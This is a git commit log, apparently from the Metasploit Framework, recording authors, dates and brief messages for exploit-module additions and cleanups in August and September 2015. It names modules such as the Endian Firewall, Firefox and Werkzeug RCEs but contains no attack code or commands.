JT 2f8dc7fdab Update w3tw0rk_exec.rb
changed response to res
2015-09-05 14:21:07 +08:00
jvazquez-r7 23ab702ec4 Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1 Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991 Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29 Use static max length 2015-09-04 16:18:55 -05:00
Ewerson Guimaraes (Crash) 68d27acd69 Update
Add exploit-db references
nil check to version
2015-09-04 23:18:24 +02:00
jvazquez-r7 1ebc25092f Delete some comments 2015-09-04 16:18:15 -05:00
Ewerson Guimaraes (Crash) 5b5e97f37a Update
Add normalize_uri
Change print_status to vprint_status
Removed unused http headers
and other minor changes
2015-09-04 22:12:42 +02:00
Roberto Soares cc405957db Add some improvements 2015-09-04 16:02:30 -03:00
Roberto Soares 4531d17cab Added the rest of the code 2015-09-04 15:37:42 -03:00
Roberto Soares b9ba12e42a Added get_token method. 2015-09-04 15:27:28 -03:00
Ewerson Guimaraes (Crash) 5063acac3c Poorly designed argument fixed
Poorly designed argument fixed
2015-09-04 19:43:49 +02:00
HD Moore 04d622b69b Cleanup Jenkins-CI module titles and option descriptions 2015-09-04 10:25:51 -07:00
Ewerson Guimaraes (Crash) cf8b34191d Updates
Add Def for cgi request.
2015-09-04 19:19:02 +02:00
Roberto Soares 6f4f8e34b4 Added method bolt_login. 2015-09-04 10:45:15 -03:00
wchen-r7 d55757350d Use the latest credential API, no more report_auth_info 2015-09-04 03:04:14 -05:00
Roberto Soares a195f5bb9e Initial commit - Skeleton 2015-09-04 04:09:16 -03:00
jvazquez-r7 ef6df5bc26 Use get_target_arch 2015-09-03 16:30:46 -05:00
jvazquez-r7 2588439246 Add references for the win32k info leak 2015-09-03 15:35:41 -05:00
James Lee b2c401696b Add certutil support.
Tested while landing #5736
2015-09-03 14:24:37 -05:00
James Lee 1e6a1f6d05 Revert "Fix spec like I shoulda done before landing #5736"
This reverts commit 956c8e550d.

Conflicts:
	spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:55 -05:00
Ewerson Guimaraes (Crash) 92aa09a586 Merge remote-tracking branch 'rapid7/master' into Uptime 2015-09-03 20:48:50 +02:00
Ewerson Guimaraes (Crash) 6250983fb4 Update
Update
2015-09-03 20:29:57 +02:00
James Lee b4547711f3 Add certutil support.
Tested while landing #5736
2015-09-03 13:27:10 -05:00
jvazquez-r7 697a6cd335 Rescue the process execute 2015-09-03 13:03:36 -05:00
jvazquez-r7 80a1e32339 Set Manual Ranking 2015-09-03 12:24:45 -05:00
HD Moore 9b51352c62 Land #5639, adds registry persistence 2015-09-03 11:26:38 -05:00
jvazquez-r7 dbe901915e Improve version detection 2015-09-03 09:54:38 -05:00
jvazquez-r7 de25a6c23c Add metadata 2015-09-02 18:32:45 -05:00
jvazquez-r7 8f70ec8256 Fix Disclosure date 2015-09-02 18:21:36 -05:00
jvazquez-r7 b912e3ce65 Add exploit template 2015-09-02 17:28:35 -05:00
HD Moore 4090c2c8ea Land #5880, adds ScriptHost UAC bypass for Win7/2008 2015-09-02 14:14:18 -05:00
Meatballs 582cc795ac Remove newlines 2015-09-02 19:42:04 +01:00
HD Moore 43d3e69fb2 Land #5917, update local exploit checks 2015-09-02 12:55:45 -05:00
HD Moore 95b9208a63 Change recv to get_once to avoid indefinite hangs, cosmetic tweaks. 2015-09-02 10:30:19 -05:00
xistence a81a9e0ef8 Added TIME_WAIT for GUI windows 2015-09-02 16:55:20 +07:00
Meatballs 8f25a006a8 Change to automatic target 2015-09-02 09:13:25 +01:00
wchen-r7 4275a65407 Update local exploit checks to follow the guidelines.
Please see wiki "How to write a check() method" to learn how
these checkcodes are determined.
2015-09-01 23:26:45 -05:00
Meatballs 27775fbe58 Restrict to 7 and 2k8 2015-09-01 22:23:37 +01:00
HD Moore cd65478d29 Land #5826, swap ExitFunction -> EXITFUNC 2015-09-01 13:58:12 -05:00
Christian Mehlmauer bfc24aea16 change exitfunc to thread 2015-09-01 10:52:25 +02:00
Christian Mehlmauer 115f409fef change exitfunc to thread 2015-09-01 10:48:07 +02:00
Christian Mehlmauer 5398bf78eb change exitfunc to thread 2015-09-01 10:46:54 +02:00
Christian Mehlmauer 3e613dc333 change exitfunc to thread 2015-09-01 10:43:45 +02:00
Christian Mehlmauer 648c034d17 change exitfunc to thread 2015-09-01 10:42:15 +02:00
Ewerson Guimaraes (Crash) 252e80e793 Uptime Version 7.4.0 / 7.5.0 Upload and Exec file 2015-08-31 23:57:39 +02:00
Brent Cook d670a62000
Land #5822, migrate obsolete payload compatibility options 2015-08-31 15:20:20 -05:00
wchen-r7 9364982467
Land #5665, Add osx rootpipe entitlements exploit for 10.10.3 2015-08-28 13:33:16 -05:00
wchen-r7 e45347e745 Explain why vulnerable 2015-08-28 13:26:01 -05:00
wchen-r7 423d52476d Normal options should be all caps 2015-08-28 13:24:23 -05:00
Muhamad Fadzil Ramli 1b4f4fd225
remove url reference 2015-08-27 19:47:37 +08:00
jvazquez-r7 da4b360202
Fix typo 2015-08-26 15:29:34 -05:00
jvazquez-r7 5d0ed797a3
Update DLL 2015-08-26 15:15:32 -05:00
jvazquez-r7 dd529013f6
Update ruby side 2015-08-26 15:12:09 -05:00
JT ff868f9704 Update w3tw0rk_exec.rb 2015-08-26 23:51:09 +08:00
JT 3f6c04a445 Update w3tw0rk_exec.rb 2015-08-26 23:48:31 +08:00
JT 16341d34a2 Update w3tw0rk_exec.rb 2015-08-26 23:34:29 +08:00
JT 892f427664 Update w3tw0rk_exec.rb
removed w3tw0rk_login
2015-08-26 09:18:15 +08:00
JT 6edba2cdc8 Update w3tw0rk_exec.rb 2015-08-26 09:11:30 +08:00
JT c77226c354 Update w3tw0rk_exec.rb 2015-08-26 01:28:07 +08:00
JT 25fb325410 w3tw0rk / Pitbul IRC Bot Remote Code Execution 2015-08-26 01:22:55 +08:00
Brent Cook b1ef560264
Merge payload_inject 64-bit inject fix from @Meatballs1 2015-08-24 09:26:00 -05:00
Muhamad Fadzil Ramli 03b1ad7491
add reference info 2015-08-24 11:18:26 +08:00
Muhamad Fadzil Ramli 73cb1383d2
amend banner info for check 2015-08-24 10:55:43 +08:00
Meatballs 1c91b126f1
X64 compat for payload_inject 2015-08-23 22:03:57 +01:00
Meatballs 228087dced
Initial working scripthost bypass uac 2015-08-23 20:16:15 +01:00
Muhamad Fadzil Ramli 7587319602
run rubocop & msftidy 2015-08-23 23:32:30 +08:00
Muhamad Fadzil Ramli a5daa5c9be
added module descriptions 2015-08-23 23:12:41 +08:00
Muhamad Fadzil Ramli 91a7531af8
konica minolta ftp server post auth cwd command exploit 2015-08-23 21:49:26 +08:00
wchen-r7 dc1e7e02b6
Land #5853, Firefox 35-36 RCE one-click exploit 2015-08-20 13:27:21 -05:00
wchen-r7 45c7e4760a Support x64 payloads 2015-08-20 02:09:58 -05:00
Brent Cook 6b94513a37
Land #5860, add tpwn OS X local kernel exploit (https://github.com/kpwn/tpwn) 2015-08-17 17:41:04 -05:00
William Vu 26165ea93f Add tpwn module 2015-08-17 17:11:11 -05:00
Brent Cook b17d8f8d49
Land #5768, update modules to use metasploit-credential 2015-08-17 17:08:58 -05:00
joev 98e2d074c3 Add disclosure date. 2015-08-15 20:09:41 -05:00
joev a133e98ba5 Adds a ff 35-36 RCE vector based off the recent ff bug. 2015-08-15 20:02:00 -05:00
HD Moore 42e08cbe07 Fix bad use of get_profile (now browser_profile) 2015-08-14 19:50:42 -05:00
jvazquez-r7 c02df6b39d
Land #5800, @bperry's Symantec Endpoint Protection Manager RCE module 2015-08-14 17:03:48 -05:00
jvazquez-r7 b33abd72ce
Complete description 2015-08-14 17:03:21 -05:00
jvazquez-r7 4aa3be7ba2
Do ruby fixing and use FileDropper 2015-08-14 17:00:27 -05:00
Spencer McIntyre 33f1324fa9
Land #5813, @jakxx adds VideoCharge SEH file exploit 2015-08-13 18:01:25 -04:00
jakxx e9d3289c23 EXITFUNC caps 2015-08-13 17:25:31 -04:00
jakxx 6e1c714b2b Update to leverage auto-NOP generation 2015-08-13 17:24:18 -04:00
jakxx 361624161b msftidy 2015-08-13 16:27:27 -04:00
jakxx 03eb2d71b2 Add watermark fileformat exploit 2015-08-13 16:26:17 -04:00
William Vu f19186adda
Land #5841, homm3_h3m default target change 2015-08-13 14:54:58 -05:00
Tod Beardsley 02c6ea31bb
Use the more recent HD version as default target 2015-08-13 14:42:21 -05:00
Christian Mehlmauer 80a22412d9 use EXITFUNC instead of ExitFunction 2015-08-13 21:22:32 +02:00
William Vu 605a14350f
Land #5833, sshexec improvements 2015-08-13 14:16:22 -05:00
William Vu 3bd6c4cee4 Add a comma 2015-08-13 14:16:09 -05:00
Mo Sadek 677ec341dd
Land #5839, pre-bloggery cleanup edits 2015-08-13 13:43:57 -05:00
William Vu c94a185610
Land #5697, Werkzeug debug RCE 2015-08-13 13:32:27 -05:00
William Vu d54ee19ce9 Clean up module 2015-08-13 13:32:22 -05:00
Tod Beardsley bb4116ed9d
Avoid msftidy.rb rule breaking on missing newline 2015-08-13 12:38:05 -05:00
jakxx e7566d6aee Adding print_status line 2015-08-12 16:08:04 -04:00
Spencer McIntyre 28fbb7cdde Update the description of the sshexec module 2015-08-12 16:05:09 -04:00
Spencer McIntyre dfe2bbf1e9 Add a python target to the sshexec module 2015-08-12 15:46:47 -04:00
Christian Mehlmauer 979d7e6be3
improve module 2015-08-12 15:37:37 +02:00